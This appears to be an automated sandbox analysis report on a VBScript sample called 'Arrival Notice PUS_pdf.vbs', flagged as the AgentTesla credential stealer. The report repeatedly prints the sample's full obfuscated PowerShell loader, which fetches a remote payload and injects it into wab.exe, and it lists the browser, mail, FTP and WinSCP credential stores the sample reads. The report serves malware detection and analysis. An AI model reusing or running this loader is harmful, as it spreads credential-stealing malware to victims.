u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSam Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Australians.Hov && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$klervske = 1;$hengivnes='substrin';$hengivnes+='g';function banuyo17($kolonihaves){$paraglossia=$kolonihaves.length-$klervske;for($grazer=5; $grazer -lt $paraglossia; $grazer+=(6)){$fradrage249+=$kolonihaves.$hengivnes.invoke($grazer, $klervske);}$fradrage249;}function decoupled($calorically){& ($sommerperioden) ($calorically);}$brodfrs=banuyo17 'b mbemstillor,kalzrehonigematllacerlmatria asse/ p.oc5klods.sy.sl0azotu prore( bjerwbuskaiufejlnligkad,yclooudstawressosstarn cran,narbejtkisse depe1kv te0incre.o lys0 nove; h na pathowscrobibndlenloved6a.skr4ma.ne;for a presixoblig6imper4uophr;fejlb kvalirshiitvtinct: gru 1carro2le,kb1diasy. demu0smi g) skin rumplgenostesolitc fo hkcyma,o blnd/paape2h.rsk0 doze1 ofma0tasti0unbad1distr0odont1vag,e tossefbrohoi semir,yvstebrnesf skirovelsexexuld/bevis1ujaev2samos1exter.thwac0sees ';$stenotaphrum=banuyo17 'trbl,ukomplsstatsesmaalr hj,o-det,ualovfog ,asteforomn un ntgreg ';$amputationer=banuyo17 'sederh ar.dtfremsttredip.luklsgalde: ansk/fr.ml/antiadkvster mandifripavsati.eg.lio. sikkgseb sobyto,omaximgnontelbal ieeinar.syntacarb.jo ,gebmbalda/interugonofcovera?takeueuvistxkvit,pr,maioindbertranst pree=caissdposteobowlewcorn,n steeluns.lomatera boncd besi&o erfiunburdsynta=prten1,aghuopars lmelongimper4underrsho.t0excurhtang,luntrejaut el,aben5astho0ton.dh u,viygodkevmel ed incrucylinsi.olaeurtep_distrshypertafl s-kulbrcscrevkhugorhthermkimperipadd r db.f- frasd.vervrno,ar ';$laservid=banuyo17 'mili.>.nten ';$sommerperioden=banuyo17 'ga boifor.seforndxv ars ';$pseudonitrosite = banuyo17 'bru,eecr.chc p.coh.odomo.kuds afsni%sol,eare.sepunderptruand.icebasavortsectiaunder%hangm\ene gaskotjusysteswopudt sprorallosaindsklpremiigigg.a balln forssamygd. alsihnormtost rmvcorka chond& sk u& stan sp,see orn,cerhvehmonaroterep .epu$ coal ';decoupled (banuyo17 'overk$kkkeng j,gellivsooud,tibsleepaphotolbarda:newsdf os.aumultilfe.tud typhmtamaraklaveaellipnforsteparalroptag=stran(,torkc,anghmrea tdnerve skunk/brrencindl langb$undulpindh spr.oceorganuhemlidaust olokalnterroi immattrombrr.dimocon,es lig i mcmutdknavemotor)inds ');decoupled (banuyo17 ',rnsk$f,stegsili lsaksnopr.blbaghanabeseeltriak:staffbd wcoogallftgngerr undey cecelko,gelemotii.appedsnakea k ajeu.ret=uddel$fyrina,lutmm.osimpfra aubekentsubdeacostltindpoicholaosemiwnopstaebuffer unsy.commissynkrpmaterl polliflight scra( fusi$fr igllnsuma cir.s metaekunstrmoderv optaibirgidfinge)bidra ');$amputationer=$botryllidae[0];decoupled (banuyo17 ',lyve$ek,orgmiswrltherioplenubfedtialfterltexti: temkfiskerisocyeovergm ubee parar kichedyna topspa= svignsvin,efibe,w port-krakeo urtzbhypopjga,eke unvocprfert bulb sl,ghsdiscoy errasshankterhere ma gmsmert.dubionhaworeprototsliv.. rojwfenesekv,enb ,uricmyreulstudei prstebssemnbogomtbeby ');decoupled (banuyo17 'arbej$jenirkstjerrbegitebarsemhaandeudsidrmrke.e fordtjunki.lensahnovemediakoasam
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$klervske = 1;$hengivnes='substrin';$hengivnes+='g';function banuyo17($kolonihaves){$paraglossia=$kolonihaves.length-$klervske;for($grazer=5; $grazer -lt $paraglossia; $grazer+=(6)){$fradrage249+=$kolonihaves.$hengivnes.invoke($grazer, $klervske);}$fradrage249;}function decoupled($calorically){& ($sommerperioden) ($calorically);}$brodfrs=banuyo17 'b mbemstillor,kalzrehonigematllacerlmatria asse/ p.oc5klods.sy.sl0azotu prore( bjerwbuskaiufejlnligkad,yclooudstawressosstarn cran,narbejtkisse depe1kv te0incre.o lys0 nove; h na pathowscrobibndlenloved6a.skr4ma.ne;for a presixoblig6imper4uophr;fejlb kvalirshiitvtinct: gru 1carro2le,kb1diasy. demu0smi g) skin rumplgenostesolitc fo hkcyma,o blnd/paape2h.rsk0 doze1 ofma0tasti0unbad1distr0odont1vag,e tossefbrohoi semir,yvstebrnesf skirovelsexexuld/bevis1ujaev2samos1exter.thwac0sees ';$stenotaphrum=banuyo17 'trbl,ukomplsstatsesmaalr hj,o-det,ualovfog ,asteforomn un ntgreg ';$amputationer=banuyo17 'sederh ar.dtfremsttredip.luklsgalde: ansk/fr.ml/antiadkvster mandifripavsati.eg.lio. sikkgseb sobyto,omaximgnontelbal ieeinar.syntacarb.jo ,gebmbalda/interugonofcovera?takeueuvistxkvit,pr,maioindbertranst pree=caissdposteobowlewcorn,n steeluns.lomatera boncd besi&o erfiunburdsynta=prten1,aghuopars lmelongimper4underrsho.t0excurhtang,luntrejaut el,aben5astho0ton.dh u,viygodkevmel ed incrucylinsi.olaeurtep_distrshypertafl s-kulbrcscrevkhugorhthermkimperipadd r db.f- frasd.vervrno,ar ';$laservid=banuyo17 'mili.>.nten ';$sommerperioden=banuyo17 'ga boifor.seforndxv ars ';$pseudonitrosite = banuyo17 'bru,eecr.chc p.coh.odomo.kuds afsni%sol,eare.sepunderptruand.icebasavortsectiaunder%hangm\ene gaskotjusysteswopudt sprorallosaindsklpremiigigg.a balln forssamygd. alsihnormtost rmvcorka chond& sk u& stan sp,see orn,cerhvehmonaroterep .epu$ coal ';decoupled (banuyo17 'overk$kkkeng j,gellivsooud,tibsleepaphotolbarda:newsdf os.aumultilfe.tud typhmtamaraklaveaellipnforsteparalroptag=stran(,torkc,anghmrea tdnerve skunk/brrencindl langb$undulpindh spr.oceorganuhemlidaust olokalnterroi immattrombrr.dimocon,es lig i mcmutdknavemotor)inds ');decoupled (banuyo17 ',rnsk$f,stegsili lsaksnopr.blbaghanabeseeltriak:staffbd wcoogallftgngerr undey cecelko,gelemotii.appedsnakea k ajeu.ret=uddel$fyrina,lutmm.osimpfra aubekentsubdeacostltindpoicholaosemiwnopstaebuffer unsy.commissynkrpmaterl polliflight scra( fusi$fr igllnsuma cir.s metaekunstrmoderv optaibirgidfinge)bidra ');$amputationer=$botryllidae[0];decoupled (banuyo17 ',lyve$ek,orgmiswrltherioplenubfedtialfterltexti: temkfiskerisocyeovergm ubee parar kichedyna topspa= svignsvin,efibe,w port-krakeo urtzbhypopjga,eke unvocprfert bulb sl,ghsdiscoy errasshankterhere ma gmsmert.dubionhaworeprototsliv.. rojwfenesekv,enb ,uricmyreulstudei prstebssemnbogomtbeby ');decoupled (banuyo17 'arbej$jenirkstjerrbegitebarsemhaandeudsidrmrke.e fordtjunki.lensahnovemediakoasam
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$klervske = 1;$hengivnes='substrin';$hengivnes+='g';function banuyo17($kolonihaves){$paraglossia=$kolonihaves.length-$klervske;for($grazer=5; $grazer -lt $paraglossia; $grazer+=(6)){$fradrage249+=$kolonihaves.$hengivnes.invoke($grazer, $klervske);}$fradrage249;}function decoupled($calorically){& ($sommerperioden) ($calorically);}$brodfrs=banuyo17 'b mbemstillor,kalzrehonigematllacerlmatria asse/ p.oc5klods.sy.sl0azotu prore( bjerwbuskaiufejlnligkad,yclooudstawressosstarn cran,narbejtkisse depe1kv te0incre.o lys0 nove; h na pathowscrobibndlenloved6a.skr4ma.ne;for a presixoblig6imper4uophr;fejlb kvalirshiitvtinct: gru 1carro2le,kb1diasy. demu0smi g) skin rumplgenostesolitc fo hkcyma,o blnd/paape2h.rsk0 doze1 ofma0tasti0unbad1distr0odont1vag,e tossefbrohoi semir,yvstebrnesf skirovelsexexuld/bevis1ujaev2samos1exter.thwac0sees ';$stenotaphrum=banuyo17 'trbl,ukomplsstatsesmaalr hj,o-det,ualovfog ,asteforomn un ntgreg ';$amputationer=banuyo17 'sederh ar.dtfremsttredip.luklsgalde: ansk/fr.ml/antiadkvster mandifripavsati.eg.lio. sikkgseb sobyto,omaximgnontelbal ieeinar.syntacarb.jo ,gebmbalda/interugonofcovera?takeueuvistxkvit,pr,maioindbertranst pree=caissdposteobowlewcorn,n steeluns.lomatera boncd besi&o erfiunburdsynta=prten1,aghuopars lmelongimper4underrsho.t0excurhtang,luntrejaut el,aben5astho0ton.dh u,viygodkevmel ed incrucylinsi.olaeurtep_distrshypertafl s-kulbrcscrevkhugorhthermkimperipadd r db.f- frasd.vervrno,ar ';$laservid=banuyo17 'mili.>.nten ';$sommerperioden=banuyo17 'ga boifor.seforndxv ars ';$pseudonitrosite = banuyo17 'bru,eecr.chc p.coh.odomo.kuds afsni%sol,eare.sepunderptruand.icebasavortsectiaunder%hangm\ene gaskotjusysteswopudt sprorallosaindsklpremiigigg.a balln forssamygd. alsihnormtost rmvcorka chond& sk u& stan sp,see orn,cerhvehmonaroterep .epu$ coal ';decoupled (banuyo17 'overk$kkkeng j,gellivsooud,tibsleepaphotolbarda:newsdf os.aumultilfe.tud typhmtamaraklaveaellipnforsteparalroptag=stran(,torkc,anghmrea tdnerve skunk/brrencindl langb$undulpindh spr.oceorganuhemlidaust olokalnterroi immattrombrr.dimocon,es lig i mcmutdknavemotor)inds ');decoupled (banuyo17 ',rnsk$f,stegsili lsaksnopr.blbaghanabeseeltriak:staffbd wcoogallftgngerr undey cecelko,gelemotii.appedsnakea k ajeu.ret=uddel$fyrina,lutmm.osimpfra aubekentsubdeacostltindpoicholaosemiwnopstaebuffer unsy.commissynkrpmaterl polliflight scra( fusi$fr igllnsuma cir.s metaekunstrmoderv optaibirgidfinge)bidra ');$amputationer=$botryllidae[0];decoupled (banuyo17 ',lyve$ek,orgmiswrltherioplenubfedtialfterltexti: temkfiskerisocyeovergm ubee parar kichedyna topspa= svignsvin,efibe,w port-krakeo urtzbhypopjga,eke unvocprfert bulb sl,ghsdiscoy errasshankterhere ma gmsmert.dubionhaworeprototsliv.. rojwfenesekv,enb ,uricmyreulstudei prstebssemnbogomtbeby ');decoupled (banuyo17 'arbej$jenirkstjerrbegitebarsemhaandeudsidrmrke.e fordtjunki.lensahnovemediakoasam Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$klervske = 1;$hengivnes='substrin';$hengivnes+='g';function banuyo17($kolonihaves){$paraglossia=$kolonihaves.length-$klervske;for($grazer=5; $grazer -lt $paraglossia; $grazer+=(6)){$fradrage249+=$kolonihaves.$hengivnes.invoke($grazer, $klervske);}$fradrage249;}function decoupled($calorically){& ($sommerperioden) ($calorically);}$brodfrs=banuyo17 'b mbemstillor,kalzrehonigematllacerlmatria asse/ p.oc5klods.sy.sl0azotu prore( bjerwbuskaiufejlnligkad,yclooudstawressosstarn cran,narbejtkisse depe1kv te0incre.o lys0 nove; h na pathowscrobibndlenloved6a.skr4ma.ne;for a presixoblig6imper4uophr;fejlb kvalirshiitvtinct: gru 1carro2le,kb1diasy. demu0smi g) skin rumplgenostesolitc fo hkcyma,o blnd/paape2h.rsk0 doze1 ofma0tasti0unbad1distr0odont1vag,e tossefbrohoi semir,yvstebrnesf skirovelsexexuld/bevis1ujaev2samos1exter.thwac0sees ';$stenotaphrum=banuyo17 'trbl,ukomplsstatsesmaalr hj,o-det,ualovfog ,asteforomn un ntgreg ';$amputationer=banuyo17 'sederh ar.dtfremsttredip.luklsgalde: ansk/fr.ml/antiadkvster mandifripavsati.eg.lio. sikkgseb sobyto,omaximgnontelbal ieeinar.syntacarb.jo ,gebmbalda/interugonofcovera?takeueuvistxkvit,pr,maioindbertranst pree=caissdposteobowlewcorn,n steeluns.lomatera boncd besi&o erfiunburdsynta=prten1,aghuopars lmelongimper4underrsho.t0excurhtang,luntrejaut el,aben5astho0ton.dh u,viygodkevmel ed incrucylinsi.olaeurtep_distrshypertafl s-kulbrcscrevkhugorhthermkimperipadd r db.f- frasd.vervrno,ar ';$laservid=banuyo17 'mili.>.nten ';$sommerperioden=banuyo17 'ga boifor.seforndxv ars ';$pseudonitrosite = banuyo17 'bru,eecr.chc p.coh.odomo.kuds afsni%sol,eare.sepunderptruand.icebasavortsectiaunder%hangm\ene gaskotjusysteswopudt sprorallosaindsklpremiigigg.a balln forssamygd. alsihnormtost rmvcorka chond& sk u& stan sp,see orn,cerhvehmonaroterep .epu$ coal ';decoupled (banuyo17 'overk$kkkeng j,gellivsooud,tibsleepaphotolbarda:newsdf os.aumultilfe.tud typhmtamaraklaveaellipnforsteparalroptag=stran(,torkc,anghmrea tdnerve skunk/brrencindl langb$undulpindh spr.oceorganuhemlidaust olokalnterroi immattrombrr.dimocon,es lig i mcmutdknavemotor)inds ');decoupled (banuyo17 ',rnsk$f,stegsili lsaksnopr.blbaghanabeseeltriak:staffbd wcoogallftgngerr undey cecelko,gelemotii.appedsnakea k ajeu.ret=uddel$fyrina,lutmm.osimpfra aubekentsubdeacostltindpoicholaosemiwnopstaebuffer unsy.commissynkrpmaterl polliflight scra( fusi$fr igllnsuma cir.s metaekunstrmoderv optaibirgidfinge)bidra ');$amputationer=$botryllidae[0];decoupled (banuyo17 ',lyve$ek,orgmiswrltherioplenubfedtialfterltexti: temkfiskerisocyeovergm ubee parar kichedyna topspa= svignsvin,efibe,w port-krakeo urtzbhypopjga,eke unvocprfert bulb sl,ghsdiscoy errasshankterhere ma gmsmert.dubionhaworeprototsliv.. rojwfenesekv,enb ,uricmyreulstudei prstebssemnbogomtbeby ');decoupled (banuyo17 'arbej$jenirkstjerrbegitebarsemhaandeudsidrmrke.e fordtjunki.lensahnovemediakoasam Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: 0000000C.00000002.2645999528.0000000025C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2645999528.0000000025C6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\FTP Navigator\Ftplist.txt Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 0000000C.00000002.2645999528.0000000025C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected AgentTesla
Source: Yara match File source: 0000000C.00000002.2645999528.0000000025C45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2645999528.0000000025C6C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1427934 Sample: Arrival Notice PUS_pdf.vbs Startdate: 18/04/2024 Architecture: WINDOWS Score: 100 31 mail.myhydropowered.com 2->31 33 ip-api.com 2->33 35 3 other IPs or domains 2->35 49 Multi AV Scanner detection for domain / URL 2->49 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 9 other signatures 2->55 9 wscript.exe 1 2->9         started        signatures3 process4 signatures5 57 VBScript performs obfuscated calls to suspicious functions 9->57 59 Suspicious powershell command line found 9->59 61 Wscript starts Powershell (via cmd or directly) 9->61 63 3 other signatures 9->63 12 powershell.exe 14 19 9->12         started        16 WmiPrvSE.exe 9->16         started        process6 dnsIp7 41 drive.usercontent.google.com 142.250.105.132, 443, 49708, 49714 GOOGLEUS United States 12->41 43 drive.google.com 142.251.15.139, 443, 49707, 49713 GOOGLEUS United States 12->43 73 Suspicious powershell command line found 12->73 75 Very long command line found 12->75 77 Found suspicious powershell code related to unpacking or dynamic code loading 12->77 18 powershell.exe 17 12->18         started        21 conhost.exe 12->21         started        23 cmd.exe 1 12->23         started        signatures8 process9 signatures10 45 Writes to foreign memory regions 18->45 47 Found suspicious powershell code related to unpacking or dynamic code loading 18->47 25 wab.exe 15 8 18->25         started        29 cmd.exe 1 18->29         started        process11 dnsIp12 37 ip-api.com 208.95.112.1, 49716, 80 TUT-ASUS United States 25->37 39 api.ipify.org 104.26.13.205, 443, 49715 CLOUDFLARENETUS United States 25->39 65 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 25->65 67 Tries to steal Mail credentials (via file / registry access) 25->67 69 Tries to harvest and steal ftp login credentials 25->69 71 2 other signatures 25->71 signatures13
  • No. of IPs < 25%
